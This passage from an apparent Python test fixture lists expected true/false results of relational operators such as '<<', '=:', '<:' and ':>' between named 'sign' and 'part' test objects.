('part', 'mary', 'part', 'john', True),
('part', 'big', 'part', 'small1', True),
('part', 'big', 'part', 'small2', True),
('part', 'big', 'part', 'small3', True),
('part', 'big', 'part', 'small4', True),
('part', 'big', 'part', 'small5', False),
('part', 'big', 'part', 'small6', False),
('part', 'big', 'part', 'small7', False),
('part', 'big', 'part', 'small8', False),
('part', 'small1', 'part', 'big', False),
('part', 'small2', 'part', 'big', False),
('part', 'small3', 'part', 'big', False),
('part', 'small4', 'part', 'big', False),
('part', 'small5', 'part', 'big', False),
('part', 'small6', 'part', 'big', False),
('part', 'small7', 'part', 'big', False),
('part', 'small8', 'part', 'big', False),
),
']]': (
('sign', 'a', 'sign', 'a', False),
('sign', 'a', 'sign', 'b', False),
('part', 's1', 'sign', 'a', False),
('sign', 'a', 'part', 's1', True),
('part', 's1', 'part', 's1', False),
('part', 's1', 'part', 'ss1', True),
('part', 'ss1', 'part', 's1', True),
('part', 'john', 'part', 'john', False),
('part', 'john', 'part', 'mary', True),
('part', 'mary', 'part', 'john', True),
('part', 'big', 'part', 'small1', False),
('part', 'big', 'part', 'small2', False),
('part', 'big', 'part', 'small3', False),
('part', 'big', 'part', 'small4', False),
('part', 'big', 'part', 'small5', False),
('part', 'big', 'part', 'small6', False),
('part', 'big', 'part', 'small7', False),
('part', 'big', 'part', 'small8', False),
('part', 'small1', 'part', 'big', True),
('part', 'small2', 'part', 'big', True),
('part', 'small3', 'part', 'big', True),
('part', 'small4', 'part', 'big', True),
('part', 'small5', 'part', 'big', False),
('part', 'small6', 'part', 'big', False),
('part', 'small7', 'part', 'big', False),
('part', 'small8', 'part', 'big', False),
),
'<<': (
('sign', 'a', 'sign', 'a', False),
('sign', 'a', 'sign', 'b', True),
('sign', 'b', 'sign', 'a', False),
('sign', 'c', 'sign', 'g', True),
('sign', 'g', 'sign', 'c', False),
('sign', 'c', 'part', 's2', False),
('sign', 'c', 'part', 's3', False),
('sign', 'c', 'part', 's4', True),
('part', 's2', 'sign', 'c', True),
('part', 's3', 'sign', 'c', False),
('part', 's4', 'sign', 'c', False),
('part', 's4', 'part', 's3', False),
('part', 's4', 'part', 's4', False),
('part', 's4', 'part', 's5', True),
('part', 's3', 'part', 's4', True),
('part', 's5', 'part', 's4', False),
('part', 's2', 'part', 'big', True),
('part', 's3', 'part', 'big', False),
('part', 's4', 'part', 'big', False),
('part', 'big', 'part', 's2', False),
('part', 'big', 'part', 's3', False),
('part', 'big', 'part', 's4', False),
('part', 'lower', 'part', 'upper', True),
('part', 'upper', 'part', 'lower', False),
('part', 'odd', 'part', 'even', False),
('part', 'even', 'part', 'odd', False),
),
'>>': (
('sign', 'a', 'sign', 'a', False),
('sign', 'a', 'sign', 'b', False),
('sign', 'b', 'sign', 'a', True),
('sign', 'c', 'sign', 'g', False),
('sign', 'g', 'sign', 'c', True),
('sign', 'c', 'part', 's2', True),
('sign', 'c', 'part', 's3', False),
('sign', 'c', 'part', 's4', False),
('part', 's2', 'sign', 'c', False),
('part', 's3', 'sign', 'c', False),
('part', 's4', 'sign', 'c', True),
('part', 's4', 'part', 's3', True),
('part', 's4', 'part', 's4', False),
('part', 's4', 'part', 's5', False),
('part', 's3', 'part', 's4', False),
('part', 's5', 'part', 's4', True),
('part', 's2', 'part', 'big', False),
('part', 's3', 'part', 'big', False),
('part', 's4', 'part', 'big', False),
('part', 'big', 'part', 's2', True),
('part', 'big', 'part', 's3', False),
('part', 'big', 'part', 's4', False),
('part', 'lower', 'part', 'upper', False),
('part', 'upper', 'part', 'lower', True),
('part', 'odd', 'part', 'even', False),
('part', 'even', 'part', 'odd', False),
),
'=:': (
('sign', 'a', 'sign', 'a', True),
('sign', 'a', 'sign', 'b', False),
('sign', 'a', 'sign', 'c', False),
('sign', 'a', 'sign', 'd', False),
('sign', 'a', 'part', 's1', True),
('sign', 'a', 'part', 's2', False),
('sign', 'a', 'part', 's3', False),
('sign', 'a', 'part', 's4', False),
('part', 's1', 'sign', 'a', True),
('part', 's1', 'sign', 'b', False),
('part', 's1', 'sign', 'c', False),
('part', 's1', 'sign', 'd', False),
('part', 's1', 'part', 'ss1', True),
('part', 's1', 'part', 'ss2', False),
('part', 's1', 'part', 'ss3', False),
('part', 's1', 'part', 'ss4', False),
('sign', 'a', 'part', 'odd', True),
('part', 'odd', 'sign', 'a', True),
('part', 's1', 'part', 'odd', True),
('part', 'd4', 'part', 't3', True),
('part', 'lower', 'part', 'odd', True),
('part', 'jim', 'part', 'all', True),
('part', 'jim1', 'part', 'all', False),
('part', 'jim2', 'part', 'all', False),
('part', 'jim3', 'part', 'all', False),
('part', 'jim1', 'part', 'jim2', False),
),
'=0:': (
('sign', 'a', 'sign', 'a', True),
('sign', 'a', 'sign', 'b', False),
('sign', 'a', 'sign', 'c', False),
('sign', 'a', 'sign', 'd', False),
('sign', 'a', 'part', 's1', True),
('sign', 'a', 'part', 's2', False),
('sign', 'a', 'part', 's3', False),
('sign', 'a', 'part', 's4', False),
('part', 's1', 'sign', 'a', True),
('part', 's1', 'sign', 'b', False),
('part', 's1', 'sign', 'c', False),
('part', 's1', 'sign', 'd', False),
('part', 's1', 'part', 'ss1', True),
('part', 's1', 'part', 'ss2', False),
('part', 's1', 'part', 'ss3', False),
('part', 's1', 'part', 'ss4', False),
('sign', 'a', 'part', 'odd', True),
('part', 'odd', 'sign', 'a', True),
('part', 's1', 'part', 'odd', True),
('part', 'd4', 'part', 't3', True),
('part', 'lower', 'part', 'odd', True),
('part', 'jim', 'part', 'all', True),
('part', 'jim1', 'part', 'all', False),
('part', 'jim2', 'part', 'all', False),
('part', 'jim3', 'part', 'all', False),
('part', 'jim1', 'part', 'jim2', False),
),
'=1:': (
('sign', 'a', 'sign', 'a', True),
('sign', 'a', 'sign', 'b', True),
('sign', 'a', 'sign', 'c', False),
('sign', 'a', 'sign', 'd', False),
('sign', 'a', 'part', 's1', True),
('sign', 'a', 'part', 's2', True),
('sign', 'a', 'part', 's3', False),
('sign', 'a', 'part', 's4', False),
('part', 's1', 'sign', 'a', True),
('part', 's1', 'sign', 'b', True),
('part', 's1', 'sign', 'c', False),
('part', 's1', 'sign', 'd', False),
('part', 's1', 'part', 'ss1', True),
('part', 's1', 'part', 'ss2', True),
('part', 's1', 'part', 'ss3', False),
('part', 's1', 'part', 'ss4', False),
('sign', 'a', 'part', 'odd', True),
('part', 'odd', 'sign', 'a', True),
('part', 's1', 'part', 'odd', True),
('part', 'd4', 'part', 't3', True),
('part', 'lower', 'part', 'odd', True),
('part', 'jim', 'part', 'all', True),
('part', 'jim1', 'part', 'all', True),
('part', 'jim2', 'part', 'all', False),
('part', 'jim3', 'part', 'all', False),
('part', 'jim1', 'part', 'jim2', True),
),
'=2:': (
('sign', 'a', 'sign', 'a', True),
('sign', 'a', 'sign', 'b', True),
('sign', 'a', 'sign', 'c', True),
('sign', 'a', 'sign', 'd', False),
('sign', 'a', 'part', 's1', True),
('sign', 'a', 'part', 's2', True),
('sign', 'a', 'part', 's3', True),
('sign', 'a', 'part', 's4', False),
('part', 's1', 'sign', 'a', True),
('part', 's1', 'sign', 'b', True),
('part', 's1', 'sign', 'c', True),
('part', 's1', 'sign', 'd', False),
('part', 's1', 'part', 'ss1', True),
('part', 's1', 'part', 'ss2', True),
('part', 's1', 'part', 'ss3', True),
('part', 's1', 'part', 'ss4', False),
('sign', 'a', 'part', 'odd', True),
('part', 'odd', 'sign', 'a', True),
('part', 's1', 'part', 'odd', True),
('part', 'd4', 'part', 't3', True),
('part', 'lower', 'part', 'odd', True),
('part', 'jim', 'part', 'all', True),
('part', 'jim1', 'part', 'all', True),
('part', 'jim2', 'part', 'all', True),
('part', 'jim3', 'part', 'all', False),
('part', 'jim1', 'part', 'jim2', True),
),
':=': (
('sign', 'a', 'sign', 'a', True),
('sign', 'a', 'sign', 'b', False),
('sign', 'a', 'sign', 'c', False),
('sign', 'a', 'sign', 'd', False),
('sign', 'a', 'part', 's1', True),
('sign', 'a', 'part', 's2', False),
('sign', 'a', 'part', 's3', False),
('sign', 'a', 'part', 's4', False),
('part', 's1', 'sign', 'a', True),
('part', 's1', 'sign', 'b', False),
('part', 's1', 'sign', 'c', False),
('part', 's1', 'sign', 'd', False),
('part', 's1', 'part', 'ss1', True),
('part', 's1', 'part', 'ss2', False),
('part', 's1', 'part', 'ss3', False),
('part', 's1', 'part', 'ss4', False),
('sign', 'i', 'part', 'odd', True),
('part', 'odd', 'sign', 'i', True),
('part', 's9', 'part', 'odd', True),
('part', 'd3', 'part', 't2', True),
('part', 'upper', 'part', 'even', True),
('part', 'jim', 'part', 'all', True),
('part', 'jim1', 'part', 'all', False),
('part', 'jim2', 'part', 'all', False),
('part', 'jim3', 'part', 'all', False),
('part', 'jim1', 'part', 'jim2', False),
),
':0=': (
('sign', 'a', 'sign', 'a', True),
('sign', 'a', 'sign', 'b', False),
('sign', 'a', 'sign', 'c', False),
('sign', 'a', 'sign', 'd', False),
('sign', 'a', 'part', 's1', True),
('sign', 'a', 'part', 's2', False),
('sign', 'a', 'part', 's3', False),
('sign', 'a', 'part', 's4', False),
('part', 's1', 'sign', 'a', True),
('part', 's1', 'sign', 'b', False),
('part', 's1', 'sign', 'c', False),
('part', 's1', 'sign', 'd', False),
('part', 's1', 'part', 'ss1', True),
('part', 's1', 'part', 'ss2', False),
('part', 's1', 'part', 'ss3', False),
('part', 's1', 'part', 'ss4', False),
('sign', 'i', 'part', 'odd', True),
('part', 'odd', 'sign', 'i', True),
('part', 's9', 'part', 'odd', True),
('part', 'd3', 'part', 't2', True),
('part', 'upper', 'part', 'even', True),
('part', 'jim', 'part', 'all', True),
('part', 'jim1', 'part', 'all', False),
('part', 'jim2', 'part', 'all', False),
('part', 'jim3', 'part', 'all', False),
('part', 'jim1', 'part', 'jim2', False),
),
':1=': (
('sign', 'a', 'sign', 'a', True),
('sign', 'a', 'sign', 'b', True),
('sign', 'a', 'sign', 'c', False),
('sign', 'a', 'sign', 'd', False),
('sign', 'a', 'part', 's1', True),
('sign', 'a', 'part', 's2', True),
('sign', 'a', 'part', 's3', False),
('sign', 'a', 'part', 's4', False),
('part', 's1', 'sign', 'a', True),
('part', 's1', 'sign', 'b', True),
('part', 's1', 'sign', 'c', False),
('part', 's1', 'sign', 'd', False),
('part', 's1', 'part', 'ss1', True),
('part', 's1', 'part', 'ss2', True),
('part', 's1', 'part', 'ss3', False),
('part', 's1', 'part', 'ss4', False),
('sign', 'i', 'part', 'odd', True),
('part', 'odd', 'sign', 'i', True),
('part', 's9', 'part', 'odd', True),
('part', 'd3', 'part', 't2', True),
('part', 'upper', 'part', 'even', True),
('part', 'jim', 'part', 'all', True),
('part', 'jim1', 'part', 'all', True),
('part', 'jim2', 'part', 'all', False),
('part', 'jim3', 'part', 'all', False),
('part', 'jim1', 'part', 'jim2', True),
),
':2=': (
('sign', 'a', 'sign', 'a', True),
('sign', 'a', 'sign', 'b', True),
('sign', 'a', 'sign', 'c', True),
('sign', 'a', 'sign', 'd', False),
('sign', 'a', 'part', 's1', True),
('sign', 'a', 'part', 's2', True),
('sign', 'a', 'part', 's3', True),
('sign', 'a', 'part', 's4', False),
('part', 's1', 'sign', 'a', True),
('part', 's1', 'sign', 'b', True),
('part', 's1', 'sign', 'c', True),
('part', 's1', 'sign', 'd', False),
('part', 's1', 'part', 'ss1', True),
('part', 's1', 'part', 'ss2', True),
('part', 's1', 'part', 'ss3', True),
('part', 's1', 'part', 'ss4', False),
('sign', 'i', 'part', 'odd', True),
('part', 'odd', 'sign', 'i', True),
('part', 's9', 'part', 'odd', True),
('part', 'd3', 'part', 't2', True),
('part', 'upper', 'part', 'even', True),
('part', 'jim', 'part', 'all', True),
('part', 'jim1', 'part', 'all', True),
('part', 'jim2', 'part', 'all', True),
('part', 'jim3', 'part', 'all', False),
('part', 'jim1', 'part', 'jim2', True),
),
'::': (
('sign', 'a', 'sign', 'a', True),
('sign', 'a', 'sign', 'b', False),
('sign', 'a', 'sign', 'c', False),
('sign', 'a', 'sign', 'd', False),
('sign', 'a', 'part', 's1', True),
('sign', 'a', 'part', 's2', False),
('sign', 'a', 'part', 's3', False),
('sign', 'a', 'part', 's4', False),
('part', 's1', 'sign', 'a', True),
('part', 's1', 'sign', 'b', False),
('part', 's1', 'sign', 'c', False),
('part', 's1', 'sign', 'd', False),
('part', 's1', 'part', 'ss1', True),
('part', 's1', 'part', 'ss2', False),
('part', 's1', 'part', 'ss3', False),
('part', 's1', 'part', 'ss4', False),
('part', 'odd', 'sign', 'a', False),
('part', 's1', 'part', 'odd', False),
('part', 'lower', 'part', 'odd', False),
('part', 'john', 'part', 'john', True),
('part', 'john', 'part', 'fred', True),
('part', 'jim', 'part', 'all', True),
('part', 'jim1', 'part', 'all', False),
('part', 'jim2', 'part', 'all', False),
('part', 'jim3', 'part', 'all', False),
('part', 'jim1', 'part', 'jim2', False),
),
':0:': (
('sign', 'a', 'sign', 'a', True),
('sign', 'a', 'sign', 'b', False),
('sign', 'a', 'sign', 'c', False),
('sign', 'a', 'sign', 'd', False),
('sign', 'a', 'part', 's1', True),
('sign', 'a', 'part', 's2', False),
('sign', 'a', 'part', 's3', False),
('sign', 'a', 'part', 's4', False),
('part', 's1', 'sign', 'a', True),
('part', 's1', 'sign', 'b', False),
('part', 's1', 'sign', 'c', False),
('part', 's1', 'sign', 'd', False),
('part', 's1', 'part', 'ss1', True),
('part', 's1', 'part', 'ss2', False),
('part', 's1', 'part', 'ss3', False),
('part', 's1', 'part', 'ss4', False),
('part', 'odd', 'sign', 'a', False),
('part', 's1', 'part', 'odd', False),
('part', 'lower', 'part', 'odd', False),
('part', 'john', 'part', 'john', True),
('part', 'john', 'part', 'fred', True),
('part', 'jim', 'part', 'all', True),
('part', 'jim1', 'part', 'all', False),
('part', 'jim2', 'part', 'all', False),
('part', 'jim3', 'part', 'all', False),
('part', 'jim1', 'part', 'jim2', False),
),
':1:': (
('sign', 'a', 'sign', 'a', True),
('sign', 'a', 'sign', 'b', True),
('sign', 'a', 'sign', 'c', False),
('sign', 'a', 'sign', 'd', False),
('sign', 'a', 'part', 's1', True),
('sign', 'a', 'part', 's2', True),
('sign', 'a', 'part', 's3', False),
('sign', 'a', 'part', 's4', False),
('part', 's1', 'sign', 'a', True),
('part', 's1', 'sign', 'b', True),
('part', 's1', 'sign', 'c', False),
('part', 's1', 'sign', 'd', False),
('part', 's1', 'part', 'ss1', True),
('part', 's1', 'part', 'ss2', True),
('part', 's1', 'part', 'ss3', False),
('part', 's1', 'part', 'ss4', False),
('part', 'odd', 'sign', 'a', False),
('part', 's1', 'part', 'odd', False),
('part', 'lower', 'part', 'odd', False),
('part', 'john', 'part', 'john', True),
('part', 'john', 'part', 'fred', True),
('part', 'jim', 'part', 'all', True),
('part', 'jim1', 'part', 'all', True),
('part', 'jim2', 'part', 'all', False),
('part', 'jim3', 'part', 'all', False),
('part', 'jim1', 'part', 'jim2', True),
),
':2:': (
('sign', 'a', 'sign', 'a', True),
('sign', 'a', 'sign', 'b', True),
('sign', 'a', 'sign', 'c', True),
('sign', 'a', 'sign', 'd', False),
('sign', 'a', 'part', 's1', True),
('sign', 'a', 'part', 's2', True),
('sign', 'a', 'part', 's3', True),
('sign', 'a', 'part', 's4', False),
('part', 's1', 'sign', 'a', True),
('part', 's1', 'sign', 'b', True),
('part', 's1', 'sign', 'c', True),
('part', 's1', 'sign', 'd', False),
('part', 's1', 'part', 'ss1', True),
('part', 's1', 'part', 'ss2', True),
('part', 's1', 'part', 'ss3', True),
('part', 's1', 'part', 'ss4', False),
('part', 'odd', 'sign', 'a', False),
('part', 's1', 'part', 'odd', False),
('part', 'lower', 'part', 'odd', False),
('part', 'john', 'part', 'john', True),
('part', 'john', 'part', 'fred', True),
('part', 'jim', 'part', 'all', True),
('part', 'jim1', 'part', 'all', True),
('part', 'jim2', 'part', 'all', True),
('part', 'jim3', 'part', 'all', False),
('part', 'jim1', 'part', 'jim2', True),
),
'<:': (
('sign', 'a', 'sign', 'c', False),
('sign', 'b', 'sign', 'c', True),
('sign', 'c', 'sign', 'c', False),
('sign', 'd', 'sign', 'c', False),
('sign', 'e', 'sign', 'c', False),
('part', 's1', 'part', 's3', False),
('part', 's2', 'part', 's3', True),
('part', 's3', 'part', 's3', False),
('part', 's4', 'part', 's3', False),
('part', 's5', 'part', 's3', False),
('sign', 'a', 'part', 's3', False),
('sign', 'b', 'part', 's3', True),
('sign', 'c', 'part', 's3', False),
('sign', 'd', 'part', 's3', False),
('sign', 'e', 'part', 's3', False),
('part', 's1', 'sign', 'c', False),
('part', 's2', 'sign', 'c', True),
('part', 's3', 'sign', 'c', False),
('part', 's4', 'sign', 'c', False),
('part', 's5', 'sign', 'c', False),
('part', 'lower', 'part', 'upper', True),
('part', 'upper', 'part', 'lower', False),
('part', 'd2', 'part', 'small2', True),
('part', 'small2', 'part', 'd2', False),
('part', 't3', 'part', 'small2', False),
('part', 'small2', 'part', 't3', True),
('part', 'tim', 'part', 'tom', True),
('part', 'tom', 'part', 'tim', False),
('part', 'tim', 'part', 'tom1n', False),
('part', 'tom1n', 'part', 'tim', False),
('part', 'tim', 'part', 'tom1p', False),
('part', 'tom1p', 'part', 'tim', False),
('part', 'tim', 'part', 'tom2n', False),
('part', 'tom2n', 'part', 'tim', False),
('part', 'tim', 'part', 'tom2p', False),
('part', 'tom2p', 'part', 'tim', False),
('part', 'timb', 'part', 'tomb', True),
('part', 'tomb', 'part', 'timb', False),
('part', 'timb', 'part', 'tomb1n', False),
('part', 'tomb1n', 'part', 'timb', False),
('part', 'timb', 'part', 'tomb1p', False),
('part', 'tomb1p', 'part', 'timb', False),
('part', 'timb', 'part', 'tomb2n', False),
('part', 'tomb2n', 'part', 'timb', False),
('part', 'timb', 'part', 'tomb2p', False),
('part', 'tomb2p', 'part', 'timb', False),
('part', 'time', 'part', 'tome', False),
('part', 'tome', 'part', 'time', True),
('part', 'time', 'part', 'tome1n', False),
('part', 'tome1n', 'part', 'time', False),
('part', 'time', 'part', 'tome1p', False),
('part', 'tome1p', 'part', 'time', False),
('part', 'time', 'part', 'tome2n', False),
('part', 'tome2n', 'part', 'time', False),
('part', 'time', 'part', 'tome2p', False),
('part', 'tome2p', 'part', 'time', False),
),
'<0:': (
('sign', 'a', 'sign', 'c', False),
('sign', 'b', 'sign', 'c', True),
('sign', 'c', 'sign', 'c', False),
('sign', 'd', 'sign', 'c', False),
('sign', 'e', 'sign', 'c', False),
('part', 's1', 'part', 's3', False),
('part', 's2', 'part', 's3', True),
('part', 's3', 'part', 's3', False),
('part', 's4', 'part', 's3', False),
('part', 's5', 'part', 's3', False),
('sign', 'a', 'part', 's3', False),
('sign', 'b', 'part', 's3', True),
('sign', 'c', 'part', 's3', False),
('sign', 'd', 'part', 's3', False),
('sign', 'e', 'part', 's3', False),
('part', 's1', 'sign', 'c', False),
('part', 's2', 'sign', 'c', True),
('part', 's3', 'sign', 'c', False),
('part', 's4', 'sign', 'c', False),
('part', 's5', 'sign', 'c', False),
('part', 'lower', 'part', 'upper', True),
('part', 'upper', 'part', 'lower', False),
('part', 'd2', 'part', 'small2', True),
('part', 'small2', 'part', 'd2', False),
('part', 't3', 'part', 'small2', False),
('part', 'small2', 'part', 't3', True),
('part', 'tim', 'part', 'tom', True),
('part', 'tom', 'part', 'tim', False),
('part', 'tim', 'part', 'tom1n', False),
('part', 'tom1n', 'part', 'tim', False),
('part', 'tim', 'part', 'tom1p', False),
('part', 'tom1p', 'part', 'tim', False),
('part', 'tim', 'part', 'tom2n', False),
('part', 'tom2n', 'part', 'tim', False),
('part', 'tim', 'part', 'tom2p', False),
('part', 'tom2p', 'part', 'tim', False),
('part', 'timb', 'part', 'tomb', True),
('part', 'tomb', 'part', 'timb', False),
('part', 'timb', 'part', 'tomb1n', False),
('part', 'tomb1n', 'part', 'timb', False),
('part', 'timb', 'part', 'tomb1p', False),
('part', 'tomb1p', 'part', 'timb', False),
('part', 'timb', 'part', 'tomb2n', False),
('part', 'tomb2n', 'part', 'timb', False),
('part', 'timb', 'part', 'tomb2p', False),
('part', 'tomb2p', 'part', 'timb', False),
('part', 'time', 'part', 'tome', False),
('part', 'tome', 'part', 'time', True),
('part', 'time', 'part', 'tome1n', False),
('part', 'tome1n', 'part', 'time', False),
('part', 'time', 'part', 'tome1p', False),
('part', 'tome1p', 'part', 'time', False),
('part', 'time', 'part', 'tome2n', False),
('part', 'tome2n', 'part', 'time', False),
('part', 'time', 'part', 'tome2p', False),
('part', 'tome2p', 'part', 'time', False),
),
'<1:': (
('sign', 'a', 'sign', 'c', True),
('sign', 'b', 'sign', 'c', True),
('sign', 'c', 'sign', 'c', True),
('sign', 'd', 'sign', 'c', False),
('sign', 'e', 'sign', 'c', False),
('part', 's1', 'part', 's3', True),
('part', 's2', 'part', 's3', True),
('part', 's3', 'part', 's3', True),
('part', 's4', 'part', 's3', False),
('part', 's5', 'part', 's3', False),
('sign', 'a', 'part', 's3', True),
('sign', 'b', 'part', 's3', True),
('sign', 'c', 'part', 's3', True),
('sign', 'd', 'part', 's3', False),
('sign', 'e', 'part', 's3', False),
('part', 's1', 'sign', 'c', True),
('part', 's2', 'sign', 'c', True),
('part', 's3', 'sign', 'c', True),
('part', 's4', 'sign', 'c', False),
('part', 's5', 'sign', 'c', False),
('part', 'lower', 'part', 'upper', True),
('part', 'upper', 'part', 'lower', False),
('part', 'd2', 'part', 'small2', True),
('part', 'small2', 'part', 'd2', False),
('part', 't3', 'part', 'small2', False),
('part', 'small2', 'part', 't3', True),
('part', 'tim', 'part', 'tom', True),
('part', 'tom', 'part', 'tim', False),
('part', 'tim', 'part', 'tom1n', True),
('part', 'tom1n', 'part', 'tim', False),
('part', 'tim', 'part', 'tom1p', True),
('part', 'tom1p', 'part', 'tim', False),
('part', 'tim', 'part', 'tom2n', False),
('part', 'tom2n', 'part', 'tim', False),
('part', 'tim', 'part', 'tom2p', False),
('part', 'tom2p', 'part', 'tim', False),
('part', 'timb', 'part', 'tomb', True),
('part', 'tomb', 'part', 'timb', False),
('part', 'timb', 'part', 'tomb1n', True),
('part', 'tomb1n', 'part', 'timb', False),
('part', 'timb', 'part', 'tomb1p', True),
('part', 'tomb1p', 'part', 'timb', False),
('part', 'timb', 'part', 'tomb2n', False),
('part', 'tomb2n', 'part', 'timb', False),
('part', 'timb', 'part', 'tomb2p', False),
('part', 'tomb2p', 'part', 'timb', False),
('part', 'time', 'part', 'tome', False),
('part', 'tome', 'part', 'time', True),
('part', 'time', 'part', 'tome1n', False),
('part', 'tome1n', 'part', 'time', True),
('part', 'time', 'part', 'tome1p', False),
('part', 'tome1p', 'part', 'time', True),
('part', 'time', 'part', 'tome2n', False),
('part', 'tome2n', 'part', 'time', False),
('part', 'time', 'part', 'tome2p', False),
('part', 'tome2p', 'part', 'time', False),
),
'<2:': (
('sign', 'a', 'sign', 'c', True),
('sign', 'b', 'sign', 'c', True),
('sign', 'c', 'sign', 'c', True),
('sign', 'd', 'sign', 'c', True),
('sign', 'e', 'sign', 'c', False),
('part', 's1', 'part', 's3', True),
('part', 's2', 'part', 's3', True),
('part', 's3', 'part', 's3', True),
('part', 's4', 'part', 's3', True),
('part', 's5', 'part', 's3', False),
('sign', 'a', 'part', 's3', True),
('sign', 'b', 'part', 's3', True),
('sign', 'c', 'part', 's3', True),
('sign', 'd', 'part', 's3', True),
('sign', 'e', 'part', 's3', False),
('part', 's1', 'sign', 'c', True),
('part', 's2', 'sign', 'c', True),
('part', 's3', 'sign', 'c', True),
('part', 's4', 'sign', 'c', True),
('part', 's5', 'sign', 'c', False),
('part', 'lower', 'part', 'upper', True),
('part', 'upper', 'part', 'lower', False),
('part', 'd2', 'part', 'small2', True),
('part', 'small2', 'part', 'd2', False),
('part', 't3', 'part', 'small2', False),
('part', 'small2', 'part', 't3', True),
('part', 'tim', 'part', 'tom', True),
('part', 'tom', 'part', 'tim', False),
('part', 'tim', 'part', 'tom1n', True),
('part', 'tom1n', 'part', 'tim', False),
('part', 'tim', 'part', 'tom1p', True),
('part', 'tom1p', 'part', 'tim', False),
('part', 'tim', 'part', 'tom2n', True),
('part', 'tom2n', 'part', 'tim', False),
('part', 'tim', 'part', 'tom2p', True),
('part', 'tom2p', 'part', 'tim', True),
('part', 'timb', 'part', 'tomb', True),
('part', 'tomb', 'part', 'timb', False),
('part', 'timb', 'part', 'tomb1n', True),
('part', 'tomb1n', 'part', 'timb', False),
('part', 'timb', 'part', 'tomb1p', True),
('part', 'tomb1p', 'part', 'timb', False),
('part', 'timb', 'part', 'tomb2n', True),
('part', 'tomb2n', 'part', 'timb', False),
('part', 'timb', 'part', 'tomb2p', True),
('part', 'tomb2p', 'part', 'timb', True),
('part', 'time', 'part', 'tome', False),
('part', 'tome', 'part', 'time', True),
('part', 'time', 'part', 'tome1n', False),
('part', 'tome1n', 'part', 'time', True),
('part', 'time', 'part', 'tome1p', False),
('part', 'tome1p', 'part', 'time', True),
('part', 'time', 'part', 'tome2n', True),
('part', 'tome2n', 'part', 'time', True),
('part', 'time', 'part', 'tome2p', False),
('part', 'tome2p', 'part', 'time', True),
),
':>': (
('sign', 'a', 'sign', 'c', False),
('sign', 'b', 'sign', 'c', False),
('sign', 'c', 'sign', 'c', False),
('sign', 'd', 'sign', 'c', True),
('sign', 'e', 'sign', 'c', False),
('part', 's1', 'part', 's3', False),
('part', 's2', 'part', 's3', False),
('part', 's3', 'part', 's3', False),
('part', 's4', 'part', 's3', True),
('part', 's5', 'part', 's3', False),
('sign', 'a', 'part', 's3', False),
('sign', 'b', 'part', 's3', False),
('sign', 'c', 'part', 's3', False),
('sign', 'd', 'part', 's3', True),
('sign', 'e', 'part', 's3', False),
('part', 's1', 'sign', 'c', False),
('part', 's2', 'sign', 'c', False),
('part', 's3', 'sign', 'c', False),
('part', 's4', 'sign', 'c', True),
('part', 's5', 'sign', 'c', False),
('part', 'lower', 'part', 'upper', False),
('part', 'upper', 'part', 'lower', True),
('part', 'd2', 'part', 'small2', False),
('part', 'small2', 'part', 'd2', True),
('part', 't3', 'part', 'small2', True),
('part', 'small2', 'part', 't3', False),
('part', 'tim', 'part', 'tom', False),
('part', 'tom', 'part', 'tim', True),
('part', 'tim', 'part', 'tom1n', False),
('part', 'tom1n', 'part', 'tim', False),
('part', 'tim', 'part', 'tom1p', False),
('part', 'tom1p', 'part', 'tim', False),
('part', 'tim', 'part', 'tom2n', False),
('part', 'tom2n', 'part', 'tim', False),
('part', 'tim', 'part', 'tom2p', False),
('part', 'tom2p', 'part', 'tim', False),
('part', 'timb', 'part', 'tomb', False),
('part', 'tomb', 'part', 'timb', True),
('part', 'timb', 'part', 'tomb1n', False),
('part', 'tomb1n', 'part', 'timb', False),
('part', 'timb', 'part', 'tomb1p', False),
('part', 'tomb1p', 'part', 'timb', False),
('part', 'timb', 'part', 'tomb2n', False),
('part', 'tomb2n', 'part', 'timb', False),
('part', 'timb', 'part', 'tomb2p', False),
('part', 'tomb2p', 'part', 'timb', False),
('part', 'time', 'part', 'tome', True),
('part', 'tome', 'part', 'time', False),
('part', 'time', 'part', 'tome1n', False),
('part', 'tome1n', 'part', 'time', False),
('part', 'time', 'part', 'tome1p', False),
('part', 'tome1p', 'part', 'time', False),
('part', 'time', 'part', 'tome2n', False),
('part', 'tome2n', 'part', 'time', False),
('part', 'time', 'part', 'tome2p', False),
('part', 'tome2p', 'part', 'time', False),
),
':0>': (
('sign', 'a', 'sign', 'c', False),
('sign', 'b', 'sign', 'c', False),
('sign', 'c', 'sign', 'c', False),
('sign', 'd', 'sign', 'c', True),
('sign', 'e', 'sign', 'c', False),
('part', 's1', 'part', 's3', False),
('part', 's2', 'part', 's3', False),
('part', 's3', 'part', 's3', False),
('part', 's4', 'part', 's3', True),
('part', 's5', 'part', 's3', False),
('sign', 'a', 'part', 's3', False),
('sign', 'b', 'part', 's3', False),
('sign', 'c', 'part', 's3', False),
('sign', 'd', 'part', 's3', True),
('sign', 'e', 'part', 's3', False),
('part', 's1', 'sign', 'c', False),
('part', 's2', 'sign', 'c', False),
('part', 's3', 'sign', 'c', False),
('part', 's4', 'sign', 'c', True),
('part', 's5', 'sign', 'c', False),
('part', 'lower', 'part', 'upper', False),
('part', 'upper', 'part', 'lower', True),
('part', 'd2', 'part', 'small2', False),
('part', 'small2', 'part', 'd2', True),
('part', 't3', 'part', 'small2', True),
('part', 'small2', 'part', 't3', False),
('part', 'tim', 'part', 'tom', False),
('part', 'tom', 'part', 'tim', True),
('part', 'tim', 'part', 'tom1n', False),
('part', 'tom1n', 'part', 'tim', False),
('part', 'tim', 'part', 'tom1p', False),
('part', 'tom1p', 'part', 'tim', False),
('part', 'tim', 'part', 'tom2n', False),
('part', 'tom2n', 'part', 'tim', False),
('part', 'tim', 'part', 'tom2p', False),
('part', 'tom2p', 'part', 'tim', False),
('part', 'timb', 'part', 'tomb', False),
('part', 'tomb', 'part', 'timb', True),
('part', 'timb', 'part', 'tomb1n', False),
('part', 'tomb1n', 'part', 'timb', False),
('part', 'timb', 'part', 'tomb1p', False),
('part', 'tomb1p', 'part', 'timb', False),
('part', 'timb', 'part', 'tomb2n', False),
('part', 'tomb2n', 'part', 'timb', False),
('part', 'timb', 'part', 'tomb2p', False),
('part', 'tomb2p', 'part', 'timb', False),
('part', 'time', 'part', 'tome', True),
('part', 'tome', 'part', 'time', False),
('part', 'time', 'part', 'tome1n', False),
('part', 'tome1n', 'part', 'time', False),
('part', 'time', 'part', 'tome1p', False),
('part', 'tome1p', 'part', 'time', False),
('part', 'time', 'part', 'tome2n', False),
('part', 'tome2n', 'part', 'time', False),
('part', 'time', 'part', 'tome2p', False),
('part', 'tome2p', 'part', 'time', False),
),
':1>': (
('sign', 'a', 'sign', 'c', False),
